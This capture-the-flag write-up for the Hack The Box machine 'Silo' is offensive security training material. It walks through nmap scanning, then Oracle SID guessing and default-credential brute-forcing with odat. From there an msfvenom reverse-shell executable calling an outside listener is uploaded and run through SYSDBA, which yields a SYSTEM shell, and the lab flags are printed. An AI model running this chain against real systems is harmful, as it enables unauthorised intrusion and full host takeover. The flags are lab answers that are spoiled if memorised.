Silo

Enumeration
As usual, we start with an nmap scan to find the open ports on the target machine.
The following nmap command scans the whole TCP port range quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.82 -oN allPorts
-sS: TCP SYN scan. This scan option is relatively unobtrusive and stealthy, since it never completes the TCP handshake.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of nmap's timing templates.
-Pn: skip host discovery and assume the host is online.
-n: scan without reverse DNS resolution.
-oN: save the scan result in normal format to a file, in this case allPorts.
# Nmap 7.92 scan initiated Wed Mar 9 10:01:38 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.82
Warning: 10.10.10.82 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.82
Host is up (0.050s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
5985/tcp open wsman
8080/tcp open http-proxy
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
# Nmap done at Wed Mar 9 10:01:55 2022 -- 1 IP address (1 host up) scanned in 17.85 seconds
As we see, there are a lot of open ports. Note the "retransmission cap hit" warning: with -T5 and --min-rate 5000 nmap may give up on a port before it answers, so if a service seems to be missing later on, re-run the scan at a lower rate. Let's obtain more information about the services and versions running on those ports.
nmap -sC -sV -p80,135,139,445,1521,5985,8080,47001,49152,49153,49154,49155,49159,49160,49161,49162 10.10.10.82 -oN targeted
-sC: run the default set of NSE scripts.
-sV: enable service and version detection.
-oN: save the scan result to a file, in this case targeted.
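The port list in the second command above was typed by hand from the first scan's output. The following is an added example (not part of the original write-up) that builds it from the allPorts file instead, so the follow-up scan always covers exactly the ports the full scan found. The sample file is a trimmed, constructed copy of the allPorts output shown above.

```shell
#!/usr/bin/env bash
# Added example: derive the -p list for the service scan from nmap -oN output.

# extract_ports FILE
#   Prints the open TCP ports in an nmap -oN file as "80,135,...".
extract_ports() {
    # Lines of interest look like "80/tcp open http" (nmap pads the columns
    # with extra spaces); keep only the port number and join with commas.
    grep -E '^[0-9]+/tcp +open' "$1" | cut -d/ -f1 | paste -s -d ',' -
}

# targeted_scan_cmd FILE HOST
#   Prints the follow-up nmap command for the open ports found in FILE,
#   and fails if the file lists no open ports at all.
targeted_scan_cmd() {
    local ports
    ports="$(extract_ports "$1")"
    [ -n "$ports" ] || { echo "no open ports found in $1" >&2; return 1; }
    printf 'nmap -sC -sV -p%s %s -oN targeted\n' "$ports" "$2"
}

# Constructed sample: a trimmed copy of the allPorts file from the scan above.
SAMPLE_ALLPORTS="$(mktemp)"
cat > "$SAMPLE_ALLPORTS" <<'EOF'
# Nmap 7.92 scan initiated Wed Mar 9 10:01:38 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.050s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
49162/tcp open  unknown
# Nmap done at Wed Mar 9 10:01:55 2022 -- 1 IP address (1 host up) scanned in 17.85 seconds
EOF

targeted_scan_cmd "$SAMPLE_ALLPORTS" 10.10.10.82
# Prints: nmap -sC -sV -p80,135,445,1521,49162 10.10.10.82 -oN targeted
```

Run it against the real allPorts file (`targeted_scan_cmd allPorts 10.10.10.82`) and paste or eval the printed command; the filter matches only "open" lines, so filtered or closed ports never end up in the list.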
# Nmap 7.92 scan initiated Wed Mar 9 10:04:10 2022 as: nmap -sCV -p80,135,139,445,1521,5985,8080,47001,49152,49153,49154,49155,49159,49160,49161,49162 -oN targeted 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http Oracle XML DB Enterprise Edition httpd
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 400 Bad Request
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-03-09T09:06:20
|_ start_date: 2022-03-09T07:34:37
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 9 10:06:22 2022 -- 1 IP address (1 host up) scanned in 132.05 seconds
If we enumerate the SMB service with crackmapexec, we see the machine is a Windows Server 2012 R2 Standard 9600 x64 host; the output also shows that SMB signing is not required and SMBv1 is enabled.
crackmapexec smb 10.10.10.82
SMB 10.10.10.82 445 SILO [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
Exploitation
On port 1521 there is an Oracle TNS listener. We can enumerate Oracle with the odat tool. It is a bit tedious to install, but let's do it. First, clone its GitHub repository.
git clone https://github.com/quentinhardy/odat
Then go into the odat/ directory and execute the following commands.
cd odat/
git submodule init
git submodule update
Now, we'll have to install some libraries.
sudo apt-get install libaio1 python3-dev alien python3-pip
As we saw with crackmapexec, the machine has an x64 architecture, so we go to Oracle's Instant Client download page and fetch the x64 RPM packages that the odat README asks for (the basic, SDK and SQL*Plus packages; the ORACLE_HOME path used below corresponds to Instant Client 21).
Now that we have the .rpm files, we use alien to convert them to .deb packages.
alien --to-deb *.rpm
Once we have the .deb files, we install them with dpkg.
dpkg -i *.deb
Next, let's install a python module.
pip3 install cx_Oracle
Then, we'll export some environment variables.
export ORACLE_HOME=/usr/lib/oracle/21/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH
Then, install some more libraries and modules.
sudo apt-get install python3-scapy
pip3 install colorlog termcolor pycrypto passlib python-libnmap
pip3 install argcomplete && sudo activate-global-python-argcomplete
And finally, we can run the odat tool.
If an error appears saying that a Python module is missing, install the module it names with pip3 and try again.
python3 odat.py --help
usage: odat.py [-h] [--version]
{all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
...
_ __ _ ___
/ \| \ / \|_ _|
( o ) o ) o || |
\_/|__/|_n_||_|
-------------------------------------------
_ __ _ ___
/ \ | \ / \ |_ _|
( o ) o ) o | | |
\_/racle |__/atabase |_n_|ttacking |_|ool
-------------------------------------------
By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
positional arguments:
{all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
Choose a main command
all to run all modules in order to know what it is possible to do
tnscmd to communicate with the TNS listener
tnspoison to exploit TNS poisoning attack (SID required)
sidguesser to know valid SIDs
snguesser to know valid Service Name(s)
passwordguesser to know valid credentials
utlhttp to send HTTP requests or to scan ports
httpuritype to send HTTP requests or to scan ports
utltcp to scan ports
ctxsys to read files
externaltable to read files or to execute system commands/scripts
dbmsxslprocessor to upload files
dbmsadvisor to upload files
utlfile to download/upload/delete files
dbmsscheduler to execute system commands without a standard output
java to execute system commands
passwordstealer to get hashed Oracle passwords
oradbg to execute a bin or script
dbmslob to download files
stealremotepwds to steal hashed passwords thanks an authentication sniffing (CVE-2012-3137)
userlikepwd to try each Oracle username stored in the DB like the corresponding pwd
smb to capture the SMB authentication
privesc to gain elevated access
cve to exploit a CVE
search to search in databases, tables and columns
unwrapper to unwrap PL/SQL source code (no for 9i version)
clean clean traces and logs
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit
To perform any attack with odat we need a SID, so we use the sidguesser option to discover valid SIDs.
python3 odat.py sidguesser -s 10.10.10.82
-s: target server.
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ##################################################################################################################################################################### | ETA: 00:00:00
It found XE as a valid SID. Now we can try to brute force credentials with the passwordguesser option. I will be using the Metasploit dictionary /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt. If you look at it, you'll see its entries are in user password format, but odat only accepts user/password, so let's change the dictionary format.
cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt | tr ' ' '/' > dictionary
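The tr command above replaces every space on a line, so a wordlist entry with a trailing space or with a second space in it ends up with three slash-separated fields and odat refuses to load it (this is what the "is not loaded in credentials list" warnings in the run below are about). The following is an added example, not part of the original write-up, that converts only the first run of whitespace and strips trailing whitespace, so every line becomes a loadable user/password pair. The sample list is constructed in the layout of the Metasploit file and includes the two entries that tr mangles; what the intended password of such entries is cannot be told from the list itself, the conversion just keeps everything after the first space.

```shell
#!/usr/bin/env bash
# Added example: Metasploit "user password" wordlist -> odat "user/password".

# convert_wordlist SRC DST
#   Writes DST in user/password form and prints the number of lines written.
convert_wordlist() {
    # 1. strip trailing whitespace (including a CR from Windows line endings)
    # 2. drop blank lines and '#' comments
    # 3. replace only the FIRST run of spaces/tabs with a single "/"
    sed -e 's/[[:space:]]*$//' "$1" \
        | grep -Ev '^(#|$)' \
        | sed -E 's/[[:space:]]+/\//' > "$2"
    wc -l < "$2" | tr -d ' '
}

# Constructed sample in the layout of
# /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt,
# including the two entries that `tr ' ' '/'` turns into three fields.
SRC="$(mktemp)"; DST="$(mktemp)"
printf '%s\n' \
    '# constructed sample, not the real Metasploit list' \
    'scott tiger' \
    'jl jl ' \
    'ose$http$admin invalid password' \
    'system manager' > "$SRC"

convert_wordlist "$SRC" "$DST"   # prints 4
cat "$DST"
# scott/tiger
# jl/jl
# ose$http$admin/invalid password
# system/manager
```

Use it as `convert_wordlist /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt dictionary` and pass the result to --accounts-file exactly as in the next step; the only difference from the tr version is that no entries are silently skipped.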
Now we could brute force credentials with odat.
python3 odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file dictionary
-s: target server.
-d: Oracle System ID (SID).
--accounts-file: file containing Oracle credentials, one user/password pair per line.
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
12:36:22 WARNING -: The line 'jl/jl/\n' is not loaded in credentials list: ['jl', 'jl', '']
12:36:22 WARNING -: The line 'ose$http$admin/invalid/password\n' is not loaded in credentials list: ['ose$http$admin', 'invalid', 'password']
The login brio_admin has already been tested at least once. What do you want to do: | ETA: --:--:--
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:06:14
[!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:05:25
[!] Notice: 'mdsys' account is locked, so skipping this username for password | ETA: 00:03:44
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:02:55
[!] Notice: 'dip' account is locked, so skipping this username for password######## | ETA: 00:02:49
[!] Notice: 'system' account is locked, so skipping this username for password############################################### | ETA: 00:01:52
[!] Notice: 'xdb' account is locked, so skipping this username for password####################################################################################### | ETA: 00:01:04
[!] Notice: 'outln' account is locked, so skipping this username for password################################################################################################## | ETA: 00:00:49
[+] Valid credentials found: scott/tiger. Continue... ############################################################################################################################################################# | ETA: 00:00:09
100% |######################################################################################################################################################################################################################| Time: 00:03:58
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
It found the user scott with the password tiger (a well-known Oracle default account). The two warnings at the start of the run are wordlist entries that the tr conversion broke: a trailing space or a second space in the line produced a third slash-separated field, so odat skipped them. Now that we have valid credentials, we can upload files with the utlfile option. Let's create a malicious binary with msfvenom that will send us a reverse shell.
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.5 lport=4444 -f exe -o shell.exe
-p: the payload to use.
lhost: IP address of our listener.
lport: port of our listener.
-f: output format.
-o: save the output to a file.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
Now, let's upload it to the machine's /Temp directory with odat.
python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile /Temp shell.exe shell.exe
-s: target server.
-d: Oracle System ID (SID).
-U: Oracle username.
-P: Oracle password.
--putFile: put a file on the remote database server (remote directory, remote file name, local file).
[1] (10.10.10.82:1521): Put the /home/alfa8sa/HTB/machines/silo/shell.exe local file in the /Temp folder like shell.exe on the 10.10.10.82 server
[-] Impossible to put the /home/alfa8sa/HTB/machines/silo/shell.exe file: `ORA-01031: insufficient privileges`
We get an error saying that we have insufficient privileges: as a normal user, scott is not allowed to use UTL_FILE. We can retry with the --sysdba option, which requests a SYSDBA connection instead. That it succeeds below means the scott account has been granted SYSDBA on this instance (remote SYSDBA logins are checked against the password file), a misconfiguration that turns a default account into full control of the database.
python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile /Temp shell.exe shell.exe --sysdba
-s: target server.
-d: Oracle System ID (SID).
-U: Oracle username.
-P: Oracle password.
--putFile: put a file on the remote database server (remote directory, remote file name, local file).
--sysdba: connect as SYSDBA.
[1] (10.10.10.82:1521): Put the /home/alfa8sa/HTB/machines/silo/shell.exe local file in the /Temp folder like shell.exe on the 10.10.10.82 server
[+] The /home/alfa8sa/HTB/machines/silo/shell.exe file was created on the /Temp directory on the 10.10.10.82 server like the shell.exe file
Now that the binary is uploaded, we want to execute it. We can do that with the externaltable option, but first let's start a netcat listener on port 4444.
nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: the port to listen on.
The following command executes the shell.exe binary, and we catch the reverse shell on the netcat listener.
python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec /Temp shell.exe --sysdba
-s: target server.
-d: Oracle System ID (SID).
-U: Oracle username.
-P: Oracle password.
--exec: execute a binary on the remote system (remote directory, file name).
--sysdba: connect as SYSDBA.
[1] (10.10.10.82:1521): Execute the shell.exe command stored in the /Temp path
We get the shell directly as nt authority\system, because the Oracle database service on this Windows host runs under the SYSTEM account (note the working directory under C:\oraclexe). There is no privilege escalation step left: we can read both the user flag and the root flag.
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49184
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type \users\phineas\desktop\user.txt
type \users\phineas\desktop\user.txt
ad6364c9113c9f1e283264078a94925c
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
8800ec7febdb70445e705e31dc7c0c33